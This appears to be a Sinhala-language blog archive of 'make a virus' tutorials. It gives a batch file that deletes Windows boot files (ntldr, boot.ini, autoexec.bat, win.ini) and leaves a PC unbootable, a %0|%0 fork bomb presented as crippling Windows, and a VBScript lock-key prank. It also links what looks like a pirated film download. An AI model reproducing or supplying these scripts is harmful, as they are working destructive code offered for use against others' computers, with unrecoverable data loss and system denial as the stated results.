Posts

Showing posts from March, 2021

NEW COMPUTER VIRUS

Image
  මේක නම් ටිකක් බයානක වැඩක්.ටිකක් පරිස්සමෙන් තමා කරන්න ඕනි.එහෙනම් අපි බලමු මොකක්ද කරන්නෙ කියලා. මුලින්ම පරිගණකයේ නෝට්පෑඩ් එක ඕපන් කරගන්න.ඊට පස්සේ මේ කෝඩ්ස් ටික ඒකට කොපි කරල පේස්ට් කරන්න. @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini දැන් ඊට පස්සේ ඔයා කැමති නමක් දාලා .bat කියල සේව් කරන්න. උදා :- virus.bat හරි දැන් මේක හදාගෙන ඉවරයි.මේක ටෙස්ට් කරන්න කලින් මේකෙන් වෙන දේ ගැන කියන්න ඕනි. මේකෙන් වෙන්නේ පරිගණකය shut down වෙලා reboot වෙන්න ඕනි කරන ෆයිල්ස් ටික නැති කරන එක.මේක ඔයාගේ පරිගණකයේ ඕපන් කරන්න එපා.මොකද මේක ඕපන් කරලා වැඩේ වුණාට පස්සේ අර නැතිවෙච්ච ෆයිල්ටික රිකවර් කරන්නත් බෑ. මම ආයිත් කියනවා.මේ වැඩේ කරන කොට ටිකක් පරිස්සමින් කරන්න.    හරි එහෙනම් මම යනවා.ඔයාලා හැමෝටම සුබම සුබ දවසක් වේවා!!!!!!!!!

OTHER COMPUTER VIRUS

Image
හරි දැන් මෙන්න මේ කෝඩ්ස් ටික නෝට්පෑඩ් එකට කොපි කරල පේස්ට් කරගන්න. %0|%0  හරි......කෝඩ්ස් ටික දැක්කම මොකද හිතුනේ?......මේ වගේ පොඩි කෝඩ් එකකින් කොහොමද වෛරස් එකක් හදන්නේ කියල නේද?ඒ වුණාට පෙනුමට පොඩි වුණාට මේක ගොඩාක් බයානක වෛරස් එකක්.මේකෙන් වෙන්නේ විශාල progress ප්‍රමාණයක් එකපාර ක්‍රියා කරවන එක.එමගින් වින්ඩෝස් මෙහෙයුම් පද්ධතිය සම්පූර්ණයෙන්ම අඩපණ වෙනව. හරී........එහෙනං එහෙන  

VIRUS MAKING PART=2

 WATCH THE VIDEO                                                                                  

යාළුවො ටිකක් රත් වෙන Fun Virus එකක් හදමුද...? MAKING VIRUS PART = 1

Image
    බය වෙන්න එපා මේවා ඇත්ත වෛරස් නෙමේ  Fun Virus.මේවයින් පරිගණකයට කිසිම හානියක් වෙන්නෙ නෑ.අපි බලමු මේක කොහොමද හදන්නෙ කියලා... ♦  මුලින්ම Note Pad එක Open කරගෙන පහලින් දීල තියන Code ටික Type කරගන්නකෝ. Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop ♦  දැන් ඕක තමන්ට කැමති නමකින් Save කරගන්න.හැබැයි නමේ අගට .vbs කියල දෙන්න ඕනෙ. ♦  දැන් ඉතින් Save කරපු .vbs File එක Double Click කරල බලන්නකෝ ඔයාලගෙ Key Board එකේ Num Lock, Caps Lock, Scroll Lock Button 3 දිහා පිස්සු නටනව නේද කියලා...           දැන් මේක නවත්තගන්න ඕනි උනාම Task Manager (Ctrl+Alt+Delete) එක Open කරගෙන ඒකෙ Run වෙන WSCRIPT.EXE File එක හොයල End Task කරන්න.එතකොට වැඩේ හරි.

WORD PRESS

Image
 WORDPRESS 

FROZEN 2 FULL MOVIE

Image
 FROZEN 2 FULL MOVIE  CLICK HEAR TO DOWNLOAD  TRAILER 

UNITY (SINHALEN)

Image
 UNITY (SINHALEN)